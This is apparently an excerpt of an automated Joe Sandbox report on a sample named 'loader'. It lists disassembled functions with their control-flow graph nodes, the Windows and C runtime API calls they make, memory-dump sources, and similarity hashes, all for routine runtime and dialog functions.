                                                                                    control_flow_graph 1094 65ba27-65ba51 call 6597e5 call 65bb4e call 65b7bb 1101 65ba57-65ba6c call 658e06 1094->1101 1102 65ba53-65ba55 1094->1102 1106 65ba9c 1101->1106 1107 65ba6e-65ba84 call 65bbf0 1101->1107 1103 65baaa-65baad 1102->1103 1108 65ba9e-65baa9 call 658dcc 1106->1108 1111 65ba89-65ba8f 1107->1111 1108->1103 1112 65ba91-65ba96 call 6591a8 1111->1112 1113 65baae-65bab2 1111->1113 1112->1106 1116 65bab4 call 658b6f 1113->1116 1117 65bab9-65bac4 1113->1117 1116->1117 1120 65bac6-65bad0 1117->1120 1121 65badb-65baf5 1117->1121 1120->1121 1123 65bad2-65bada call 658dcc 1120->1123 1121->1108 1122 65baf7-65bafe 1121->1122 1122->1108 1124 65bb00-65bb17 call 65b691 1122->1124 1123->1121 1124->1108 1129 65bb19-65bb23 1124->1129 1129->1108
                                                                                    APIs
                                                                                      • Part of subcall function 006597E5: _free.LIBCMT ref: 0065981C
                                                                                      • Part of subcall function 006597E5: _abort.LIBCMT ref: 00659863
                                                                                      • Part of subcall function 0065BB4E: _abort.LIBCMT ref: 0065BB80
                                                                                      • Part of subcall function 0065BB4E: _free.LIBCMT ref: 0065BBB4
                                                                                    • _free.LIBCMT ref: 0065BA9F
                                                                                    • _free.LIBCMT ref: 0065BAD5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$_abort
                                                                                    • String ID:
                                                                                    • API String ID: 195396716-0
                                                                                    • Opcode ID: be2eba42cb637e772f294809cf4db8ddf717d798fad4c8f0045b8c891fc606d8
                                                                                    • Instruction ID: fdd91d60e7fff1b8ce681f135430301d0d84159a1cf7da18c89fd3342f1482c5
                                                                                    • Opcode Fuzzy Hash: be2eba42cb637e772f294809cf4db8ddf717d798fad4c8f0045b8c891fc606d8
                                                                                    • Instruction Fuzzy Hash: 9F31B131904209AFDB10EFA9D441B99B7F7EF40322F21509DEC04AB2A2EB725D49DB54
                                                                                    Function 00631E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1130 631e50-631e7f call 64eb78 call 633bba 1134 631e84-631e86 1130->1134 1135 631f0f-631f1b 1134->1135 1136 631e8c-631ebd call 631732 call 6318a9 1134->1136 1138 631f36-631f44 1135->1138 1139 631f1d-631f21 1135->1139 1149 631ebf-631ecc call 641c3b 1136->1149 1150 631ece-631ed5 1136->1150 1141 631f23-631f2c call 63f445 1139->1141 1142 631f2f-631f35 call 653e2e 1139->1142 1141->1142 1142->1138 1157 631efb-631f0e call 653e13 call 6318a9 1149->1157 1152 631ed7-631eec call 641bfd 1150->1152 1153 631eee-631ef6 call 641b84 1150->1153 1152->1157 1153->1157 1157->1135
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 00631E55
                                                                                      • Part of subcall function 00633BBA: __EH_prolog.LIBCMT ref: 00633BBF
                                                                                    • _wcslen.LIBCMT ref: 00631EFD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog$_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 2838827086-0
                                                                                    • Opcode ID: 3e9828c314e5d60f9ce2ecc50892e2a84a76f2f0c202cf13d088372d282aaa54
                                                                                    • Instruction ID: 1a4c244c6457ff221200d4ee4cf254354b961017371fe81aecdf581849ee6f63
                                                                                    • Opcode Fuzzy Hash: 3e9828c314e5d60f9ce2ecc50892e2a84a76f2f0c202cf13d088372d282aaa54
                                                                                    • Instruction Fuzzy Hash: 33314971904209AFCF51DF98C945AEEBBF6AF09300F10046EF845AB251CB325E51CBA4
                                                                                    Function 00659869 Relevance: 3.1, APIs: 2, Instructions: 53COMMONLIBRARYCODE
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1163 659869-659880 1165 659882-65988c call 65ae5b 1163->1165 1166 65988e-659895 call 65b136 1163->1166 1165->1166 1171 6598df-6598e6 1165->1171 1169 65989a-6598a0 1166->1169 1172 6598a2 1169->1172 1173 6598ab-6598b9 call 65aeb1 1169->1173 1179 6598e8-6598ed 1171->1179 1174 6598a3-6598a9 call 658dcc 1172->1174 1181 6598be-6598d4 call 659649 call 658dcc 1173->1181 1182 6598bb-6598bc 1173->1182 1183 6598d6-6598dd 1174->1183 1181->1171 1181->1183 1182->1174 1183->1179
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free
                                                                                    • String ID:
                                                                                    • API String ID: 269201875-0
                                                                                    • Opcode ID: 1043c89dc87cdf2b90e7d1c9532624618a85e4d88754971d0b2e2599abf5c82c
                                                                                    • Instruction ID: dedc03ad0738f684ca5e25291678a37f3249f2accae8540893303404b28f9545
                                                                                    • Opcode Fuzzy Hash: 1043c89dc87cdf2b90e7d1c9532624618a85e4d88754971d0b2e2599abf5c82c
                                                                                    • Instruction Fuzzy Hash: 6A014436104701EBC3122764AC8595B256FDFD3373F200A39FC04A2392EF608C0E5178
                                                                                    Function 0063A243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNELBASE(00000001,00000001,?,0063A23A,?,0063A2E9,00000001,00000001,?,?,0063A175,?,00000001,00000000,?,?), ref: 0063A254
                                                                                      • Part of subcall function 0063BB03: _wcslen.LIBCMT ref: 0063BB27
                                                                                    • GetFileAttributesW.KERNELBASE(?,00000001,?,00000800,?,0063A23A,?,0063A2E9,00000001,00000001,?,?,0063A175,?,00000001,00000000), ref: 0063A280
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: AttributesFile$_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 2673547680-0
                                                                                    • Opcode ID: a9735e9634b8407b99b083dd6f0b4aabaa23ca1bf1a6d8a4e9a626d678e600a6
                                                                                    • Instruction ID: a6c2d580e21b31cba7558889c66350b15e2c79a399b3421511416d7298d79822
                                                                                    • Opcode Fuzzy Hash: a9735e9634b8407b99b083dd6f0b4aabaa23ca1bf1a6d8a4e9a626d678e600a6
                                                                                    • Instruction Fuzzy Hash: 97E092319001245BCB50AB64CC05BD9B75EAB083E1F044261FE95E3290DB71DE44CBE0
                                                                                    Function 0064DEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _swprintf.LIBCMT ref: 0064DEEC
                                                                                      • Part of subcall function 00634092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006340A5
                                                                                    • SetDlgItemTextW.USER32(00000065,?), ref: 0064DF03
                                                                                      • Part of subcall function 0064B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0064B579
                                                                                      • Part of subcall function 0064B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0064B58A
                                                                                      • Part of subcall function 0064B568: IsDialogMessageW.USER32(00010406,?), ref: 0064B59E
                                                                                      • Part of subcall function 0064B568: TranslateMessage.USER32(?), ref: 0064B5AC
                                                                                      • Part of subcall function 0064B568: DispatchMessageW.USER32(?), ref: 0064B5B6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                    • String ID:
                                                                                    • API String ID: 2718869927-0
                                                                                    • Opcode ID: 7407449c355f39471f6f0f0fbe4116029e402f80444e3c01bf918cf82ed6aafc
                                                                                    • Instruction ID: a0e5e918a8d0b9fa9e3e6836f77bec490a1238ebea12976b82ccfd1b5005b66b
                                                                                    • Opcode Fuzzy Hash: 7407449c355f39471f6f0f0fbe4116029e402f80444e3c01bf918cf82ed6aafc
                                                                                    • Instruction Fuzzy Hash: FAE0D8B65003582ADF42AF60DC0BFDE3BAE5B05785F040855B204DB0F3DA79EA908775
                                                                                    Function 00652B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00652BAA
                                                                                    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00652BB5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                    • String ID:
                                                                                    • API String ID: 1660781231-0
                                                                                    • Opcode ID: d47c5720280724db0257b02f28512b009159b135a453327a97f13a41ecab7d80
                                                                                    • Instruction ID: dd70f88e617f786b09babce871d4280dd324ef8df339bf9fc8e5ed5466a0192e
                                                                                    • Opcode Fuzzy Hash: d47c5720280724db0257b02f28512b009159b135a453327a97f13a41ecab7d80
                                                                                    • Instruction Fuzzy Hash: 55D0A939154213294E942A7068B2488335BAE43BBBFE0138EEC2085AC1EB11808CA11A
                                                                                    Function 006312F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemShowWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3351165006-0
                                                                                    • Opcode ID: a3021daa5e55b96f0301c2a04931665250d7f5a50b248553987c4a04ba065242
                                                                                    • Instruction ID: 32e29a213c092f7b832ffa0f9577d3b500fdaed30e7165b5ecc20ba66fb26814
                                                                                    • Opcode Fuzzy Hash: a3021daa5e55b96f0301c2a04931665250d7f5a50b248553987c4a04ba065242
                                                                                    • Instruction Fuzzy Hash: 98C0123605C220BECB010FB4DC09C2BBBAEABA5316F04C90AB0A5C0270C239C110DB11
                                                                                    Function 00631A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    • Opcode ID: 1395f984ab2cfb24f20b5c4e0b260041fb34ff706c90f79a93bbdf2e23faabda
                                                                                    • Instruction ID: 297c52269dfd1466b33962c74e3c938f389a27443e0be387b770c5a3a1472d57
                                                                                    • Opcode Fuzzy Hash: 1395f984ab2cfb24f20b5c4e0b260041fb34ff706c90f79a93bbdf2e23faabda
                                                                                    • Instruction Fuzzy Hash: 2BC19170A002549FEF15CF68C894BE9BBA7AF17310F0805B9EC469F396DB349945CBA1
                                                                                    Function 00633BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    • Opcode ID: 036ab9513505a17285df9c0b70a40a2499bc05af2c9a37c0c7e39903daf691d3
                                                                                    • Instruction ID: c2a21ffefba45d42faa8bc92c5702582ed3084aa901fca788114e148e12baaea
                                                                                    • Opcode Fuzzy Hash: 036ab9513505a17285df9c0b70a40a2499bc05af2c9a37c0c7e39903daf691d3
                                                                                    • Instruction Fuzzy Hash: BC71EF71500B949EDB25DF70C8519E7B7EAAF15301F40492EF2AB87342DA326A88CF95
                                                                                    Function 00639A74 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00639A50,?,?,00000000,?,?,00638CBC,?), ref: 00639BAB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: FilePointer
                                                                                    • String ID:
                                                                                    • API String ID: 973152223-0
                                                                                    • Opcode ID: 8ac6c3581f92dcd6abda799e3dce265733deaf91ea431681ea884a6479774b6c
                                                                                    • Instruction ID: 6ffd6814b35086d33d5c17a0151133f6d850ddf970104fff035dfa7b584084fa
                                                                                    • Opcode Fuzzy Hash: 8ac6c3581f92dcd6abda799e3dce265733deaf91ea431681ea884a6479774b6c
                                                                                    • Instruction Fuzzy Hash: 21418B316043118BDB249F15E5844ABF7E7FBE4320F148A6DE89283360D7F0AD458EE1
                                                                                    Function 00638284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 00638289
                                                                                      • Part of subcall function 006313DC: __EH_prolog.LIBCMT ref: 006313E1
                                                                                      • Part of subcall function 0063A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0063A598
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog$CloseFind
                                                                                    • String ID:
                                                                                    • API String ID: 2506663941-0
                                                                                    • Opcode ID: 8ddf4f00789701f4393405bee1199163ba9adfeb4ffc219f69ce05d44a534c5e
                                                                                    • Instruction ID: 9fec060450f580f2f9d6e3fd433d2b9e5e44691fcd20c2e9b2e35ed9853ff54e
                                                                                    • Opcode Fuzzy Hash: 8ddf4f00789701f4393405bee1199163ba9adfeb4ffc219f69ce05d44a534c5e
